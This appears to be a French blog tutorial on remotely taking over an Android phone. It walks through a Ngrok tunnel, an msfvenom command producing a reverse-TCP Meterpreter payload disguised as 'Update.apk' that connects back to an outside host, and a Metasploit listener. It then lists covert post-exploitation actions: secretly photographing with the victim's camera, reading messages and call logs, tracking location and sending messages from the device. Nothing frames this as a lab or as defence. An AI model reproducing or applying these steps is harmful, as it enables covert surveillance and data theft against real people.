Hacking Android Device [Remotely]

Hacking over WAN

Vous pouvez vérifier mon Vidéo-tutoriel sur youtube ici:
https://youtu.be/Bbp-AcejtHI

Usuellement dans le WAN, d’abord vous devez avoir une IP statique / nom d’hôte et deuxièmement, vous devez faire Port Forwarding pour permettre votre transmission de trafic, et nous savons tous que les deux sont si difficiles en temps réel car nous avons un accès limité aux ports dans un réseau.

Donc, ce que nous allons faire dans ce scénario, nous allons mettre en place un tunnel sécurisé en utilisant Ngrok.

Ngrok est un système de proxy inverse de tunneling qui établit des tunnels à partir d’un point d’extrémité public c’est-à-dire un internet vers un service réseau fonctionnant localement. Cela peut nous aider à créer une URL HTTP/HTTPS publique pour un site web fonctionnant localement dans notre machine. Nous n’avons pas besoin de faire n’importe quel type de transfert de port tout en utilisant Ngrok et notre service réseau finira par s’exposer à l’Internet avec l’aide du tunneling TCP.

Suivez ces étapes pour procéder :

Étape 1 : Inscrivez-vous au compte Ngrok pour le télécharger.

D’abord, vous devrez vous inscrire au compte Ngrok, après quoi il vous invitera à la fenêtre de téléchargement.

Fenêtre d’inscription de Ngrok

Après vous être inscrit, vous pouvez télécharger le Ngrok pour votre système Linux.

Dézippez simplement le fichier téléchargé.

Etape2 : Connectez votre compte

L’exécution de cette commande ajoutera votre jeton d’authentification au fichier de configuration ngrok.ymlpar défaut. Cela vous donnera accès à plus de fonctionnalités et à des temps de session plus longs. (Vous devez copier et coller votre propre jeton ici fourni dans l’écran d’accueil de ngrok après vous être connecté)

./ngrok authtoken <votre jeton>

Maintenant vous êtes prêt à utiliser cet outil. Ouvrez votre terminal, déplacez-vous dans le répertoire où vous avez extrait l’outil Ngrock et tapez:

./ngrok tcp

choisissez un numéro de port sur lequel vous voulez lier une connexion(ici, j’ai choisi 5555 comme numéro de port). Et après avoir appuyé sur entrée, un écran comme celui-ci apparaîtra.

La redirection spécifie ici le tunnel TCP que ngrok a créé. La connexion est liée à l’hôte local au port 5555. Maintenant, nous devons générer une charge utile malveillante en utilisant msfvenom.

Étape 3 : Génération de la charge utile

Vous pouvez le faire en ouvrant un nouveau Terminal dans votre machine Kali Linux, puis en tapant le code suivant.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Mais souvenez-vous, cette fois-ci, c’est un peu différent de l’attaque que nous avions l’habitude d’effectuer dans le réseau local. Ici, à la place de l’adresse IP, nous devrons entrer le lien de redirection fourni dans le ngrok (2.tcp.ngrok.io). Et le numéro de port sera 15787. Rappelez-vous que, il est important d’entrer le même numéro de port fourni par Ngrok dans la redirection de port.

Note : Si entrer l’adresse IP comme 2.tcp.ngrok.io ne fonctionne pas, vous pouvez la remplacer par une adresse IP que vous pouvez obtenir en utilisant la commande « ping ».
Ouvrez un terminal et tapez ping 2.tcp.ngrok.io et appuyez sur entrée. Vous obtiendrez une adresse IP que vous devez mettre à la place de LHOST.

Ici, j’ai utilisé « Update.apk » comme nom de fichier pour notre charge utile. Ce fichier doit être installé sur l’appareil Android de notre cible. Mais avant d’installer ce fichier, nous devons configurer notre écouteur. Pour ce faire, suivez l’étape 4.

Étape 4 : Configurer un listener

Ouvrez votre terminal et chargez la console Metasploit, en tapant : msfconsole
Après son chargement(après quelques secondes), chargez l’exploit multi-handler en tapant :

use exploit/multi/handler

Maintenant, configurez un reverse payload en tapant :

set payload android/meterpreter/reverse_tcp

Set your LHOST as 0.0.0.0 et LPORT comme 5555
(Le numéro de port doit être le même que celui qui a été utilisé pour lier la connexion dans le ngrok)

set LHOST 0.0.0.0
set LPORT 5555

Enfin, tapez exploit pour démarrer le listener.

Le mode d’écoute est activé

Étape 5 : Installer le fichier Malicious Update.apk dans l’appareil de la cible

Laissez la victime installer l’application, et exécutez-la dès qu’elle est installée. Lorsque la victime touche l’option ouvrir l’app, vous aurez accès à toutes les fonctionnalités de l’appareil android. Cependant, rien ne s’affichera sur l’écran de l’appareil après l’ouverture de l’app.

Post-exploitation

Tapez l’aide pour voir les différentes options que vous pouvez utiliser pour effectuer les différentes tâches sur l’appareil de la victime.
Vous pouvez accéder à leur appareil photo et prendre une photo sans les avertir. Vous pouvez vérifier leurs messages, leurs journaux d’appels et les enregistrer dans votre système également.
Aussi, vous pouvez voir et ouvrir n’importe quelle application installée sur leur appareil. Vous pouvez même obtenir les coordonnées de l’emplacement actuel de l’utilisateur.
Vous pouvez également envoyer des messages à n’importe quel numéro de contact via leur appareil.

.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.